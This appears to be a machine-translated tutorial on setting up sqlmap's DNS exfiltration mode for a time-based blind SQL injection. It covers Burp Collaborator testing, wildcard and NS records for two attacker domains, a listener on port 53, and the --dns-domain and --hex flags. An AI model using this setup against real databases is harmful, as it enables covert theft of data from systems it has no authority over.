There are too few articles on dns injection for sqlmap on the Internet. They only briefly introduce the --dns-domain parameter. The relevant practical articles are either vague or mentioned in one stroke, which is confusing (mainly dishes, The key is not brought by the boss yet). Then I did it again by referring to the methods on the Internet.
Things that need to be prepared are one sqlmap, windows blind injection, two domain names, and an external network server.
#One time when I was doing something, I came across a time blind injection. It happened to be a Windows machine, and I remembered the method of dns injection.
Before I start, I plan to use the --sql-shell command of sqlmap to test the dns injection payload
First go to the collaborator client in burpsuite and copy the domain name arranged by burp for us
Using sqlmap to execute the sql statement
Sqlmap is still running The request has been received in burpsuite.
##352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.
352E362E3134 is the result returned after executing version().
Decode to obtain the version of mysql. Well, there is nothing wrong with dns injection at this point.
Prepare to configure two domain names. Some articles on the Internet say that one is fine, but it always feels more troublesome. Many domain name server providers do not provide certain advanced functions, so it is easier to prepare two.
www.a.com
www.b.com
First we configure the domain name a-> a.com
You only need to add * to perform pan-analysis and point to the IP of our external network server.
Now let’s configure our domain name b->b.com
This is even simpler. Just modify the dns of the domain name directly and fill in ns1 .a.com ns2.a.com is enough. There is no need to do anything else, just fill it in.
Then wait for the domain name to take effect. We go to the external network server to test whether the parsing is successful
The server starts listening to port 53
Then The local computer pings hello.b.com and sends it to the external server. We have been able to receive the request from hello.b.com, and the local computer prompts that the host cannot be found and does not need to be ignored because we have not set up parsing. Now that everything is configured, we can use sqlmap for dns injection.
Add the parameter --dns-domain=b.com --hex to Sqlmap and you can
to At this step, sqlmap will get stuck and prompt to set up the DNS server instance
Direct ctrl c
prompts that the data retrieval through the DNS channel is successful.
The injection speed is as fast as error reporting and union, so you no longer have to endure the slow speed.
The above is the detailed content of What is the sqlmap _dns injection configuration method?. For more information, please follow other related articles on the PHP Chinese website!
